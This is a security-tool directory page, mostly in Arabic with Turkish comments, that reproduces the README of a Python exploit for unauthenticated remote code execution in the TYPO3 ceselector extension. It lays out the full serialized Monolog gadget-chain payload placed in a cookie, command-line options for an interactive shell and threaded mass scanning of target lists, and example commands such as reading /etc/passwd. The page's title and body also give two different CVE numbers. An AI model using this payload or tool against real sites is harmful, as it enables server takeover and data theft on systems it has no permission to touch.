Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-46275 — استغلال بلغة Python لـ CVE-2026-46725، يحقق تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه في إضافة ceselector الخاصة بـ TYPO3 عبر حقن كائن PHP وسلسلة أدوات Monolog. | Kitploit
أدوات/GitHubGitHub/xxconi/cve-2026-46275
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubxxconi/cve-2026-46275

CVE-2026-46275

استغلال بلغة Python لـ CVE-2026-46725، يحقق تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه في إضافة ceselector الخاصة بـ TYPO3 عبر حقن كائن PHP وسلسلة أدوات Monolog.

عرض المستودع
9منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-46725 — ثغرة RCE في امتداد TYPO3 ceselector

حقن كائنات PHP عبر تجاوز ملف تعريف الارتباط unserialize() → تنفيذ الأكواد عن بُعد

CVSS CWE Auth Python License


📋 جدول المحتويات

  • حول الثغرة
  • التفاصيل التقنية
  • المتطلبات
  • التثبيت
  • الاستخدام
  • أمثلة
  • تنسيق الإخراج
  • كيف يعمل
  • المراجع
  • إخلاء المسؤولية القانوني

🔍 حول الثغرة

المجالالتفاصيل
معرف CVECVE-2026-46725
المنتجامتداد TYPO3 ceselector (mmc/ceselector)
الإصدار المتأثر<= 1.1.3
نوع الثغرةإلغاء تسلسل غير آمن (حقن كائنات PHP)
درجة CVSS9.8 حرجة
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-502 (إلغاء تسلسل البيانات غير الموثوقة)
درجة EPSS0.0046 (المئين 64.3)
المصادقةغير مطلوبة (بدون مصادقة)
التأثيرRCE كامل — تحكم كامل في النظام
الباحثDhiyaneshDk

الوصف

يقوم امتداد TYPO3 ceselector بتمرير قيمة ملف تعريف الارتباط المسماة T3_ceselector_* مباشرةً إلى دالة unserialize() دون أي تحقق. يمكن للمهاجم وضع حمولة حقن كائنات PHP معدّة خصيصًا في ملف تعريف الارتباط هذا لتنفيذ أوامر عشوائية على الخادم.

⚠️ الشرط المسبق: يجب تفعيل إعداد Persistent Mode: Static في إعدادات TYPO3 حتى يمكن استغلال الثغرة.


🔧 التفاصيل التقنية

تسلسل الهجوم

1. GET /  →  Sunucu Set-Cookie: T3_ceselector_<id>=<value> döner
2. GET /  →  Cookie: T3_ceselector_<id>=<PAYLOAD>
             └─ PHP unserialize() tetiklenir
             └─ Monolog Gadget Chain çalışır
             └─ system("id") çıktısı response'a yansır

سلسلة الأدوات (Gadget Chain)

Monolog\Handler\GroupHandler
  └─ Monolog\Handler\BufferHandler
       └─ Monolog\LogRecord (buffer)
            └─ processors: [get_object_vars, end, system]
                 └─ system("<CMD>")  ← RCE

بنية الحمولة

O:28:"Monolog\Handler\GroupHandler":1:{
  s:11:"*handlers";a:1:{
    i:0;O:29:"Monolog\Handler\BufferHandler":6:{
      s:10:"*handler";r:3;
      s:13:"*bufferSize";i:1;
      s:14:"*bufferLimit";i:0;
      s:9:"*buffer";a:1:{
        i:0;O:17:"Monolog\LogRecord":2:{
          s:5:"level";E:19:"Monolog\Level:Debug";
          s:5:"mixed";s:2:"id";   ← OS komutu buraya
        }
      }
      s:14:"*initialized";b:1;
      s:13:"*processors";a:3:{
        i:0;s:15:"get_object_vars";
        i:1;s:3:"end";
        i:2;s:6:"system";   ← sink
      }
    }
  }
}

📦 المتطلبات

  • Python 3.8+
  • مكتبة requests
Python >= 3.8
requests >= 2.28.0

⚙️ التثبيت

# Repoyu klonla
git clone https://github.com/example/CVE-2026-46725
cd CVE-2026-46725

# Bağımlılıkları yükle
pip install requests

# veya requirements.txt ile
pip install -r requirements.txt

requirements.txt

requests>=2.28.0
urllib3>=1.26.0

🚀 الاستخدام

usage: CVE-2026-46725 [-h] (-u URL | -l FILE) [-c CMD] [-i]
                      [-t N] [--timeout S] [--proxy URL]
                      [-o FILE] [-v] [--no-color]

options:
Hedef:
  -u, --url URL       Tek hedef URL
  -l, --list FILE     Hedef listesi (satır başı URL)

Exploit:
  -c, --cmd CMD       Çalıştırılacak OS komutu (varsayılan: id)
  -i, --interactive   Başarılı exploit sonrası interaktif shell aç

Tarama:
  -t, --threads N     Thread sayısı (varsayılan: 10)
  --timeout S         Timeout saniye (varsayılan: 15)
  --proxy URL         Proxy (örn: http://127.0.0.1:8080)

Çıktı:
  -o, --output FILE   Sonuç dosyası
  -v, --verbose       Ayrıntılı çıktı
  --no-color          Renksiz çıktı

📌 أمثلة

هدف واحد — الاستخدام الأساسي

python CVE-2026-46725.py -u https://typo3-site.com

تنفيذ أمر مخصص

python CVE-2026-46725.py -u https://typo3-site.com -c "whoami"
python CVE-2026-46725.py -u https://typo3-site.com -c "cat /etc/passwd"
python CVE-2026-46725.py -u https://typo3-site.com -c "uname -a"

قشرة تفاعلية

python CVE-2026-46725.py -u https://typo3-site.com --interactive
typo3@ceselector $ id
│ uid=33(www-data) gid=33(www-data) groups=33(www-data)
typo3@ceselector $ uname -a
│ Linux web01 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
typo3@ceselector $ pwd
│ /var/www/html
typo3@ceselector $ exit

فحص جماعي

# 20 thread ile tara, sonuçları kaydet
python CVE-2026-46725.py -l targets.txt -t 20 -o results.txt

# 30 thread, özel komut
python CVE-2026-46725.py -l targets.txt -t 30 -c "id"

عبر بروكسي (Burp Suite)

python CVE-2026-46725.py -u https://typo3-site.com \
  --proxy http://127.0.0.1:8080 -v

تنسيق targets.txt

https://site1.com
https://site2.com
http://site3.com
site4.com

📊 تنسيق الإخراج

مخرجات الطرفية

① TYPO3 & ceselector Tespit
────────────────────────────────────────────────────
· TYPO3             ✓ Tespit edildi
· ceselector        ✓ Aktif
· Cookie Adı        T3_ceselector_48291
· TYPO3 Sürüm       12.4.3

② Payload Hazırlanıyor
────────────────────────────────────────────────────
· Teknik            PHP Object Injection → Monolog Gadget Chain
· Gadget            Monolog\Handler\GroupHandler
· Sink              system()
· Komut             id

④ RCE Çıktısı
────────────────────────────────────────────────────
┌─ RCE ÇIKTISI ───────────────────────────────────
│ uid=33(www-data) gid=33(www-data) groups=33(www-data)
└─────────────────────────────────────────────────

ملف السجل (results.txt)

============================================================
CVE-2026-46725 — TYPO3 ceselector RCE
Tarih: 2026-05-26 17:30:00
============================================================

[+] RCE ALINAN HEDEFLER (2)
----------------------------------------
URL        : https://typo3-site.com
Sürüm      : 12.4.3
Cookie     : T3_ceselector_48291
Komut      : id
Çıktı      : uid=33(www-data) gid=33(www-data) groups=33(www-data)

🔬 كيف يعمل

┌─────────────────────────────────────────────────────────┐
│                    EXPLOIT AKIŞI                        │
├─────────────────────────────────────────────────────────┤
│                                                         │
│  1. TESPIT                                              │
│     GET /  ──────────────────────► TYPO3 Sunucu        │
│             ◄──── Set-Cookie: T3_ceselector_XXXXX ───── │
│                                                         │
│  2. PAYLOAD HAZIRLAMA                                   │
│     build_payload("id")                                 │
│     └─ Monolog gadget chain URL-encode edilir           │
│                                                         │
│  3. EXPLOIT                                             │
│     GET /                                               │
│     Cookie: T3_ceselector_XXXXX=O:28:"Monolog...        │
│             ──────────────────────► unserialize()       │
│                                    └─ __destruct()      │
│                                    └─ system("id")      │
│             ◄──── uid=33(www-data) gid=33(www-data) ─── │
│                                                         │
│  4. DOĞRULAMA                                           │
│     regex: uid=\d+\([a-z_][a-z0-9_-]*\)\s+gid=...      │
│                                                         │
└─────────────────────────────────────────────────────────┘

📚 المراجع

تنزيل الأداة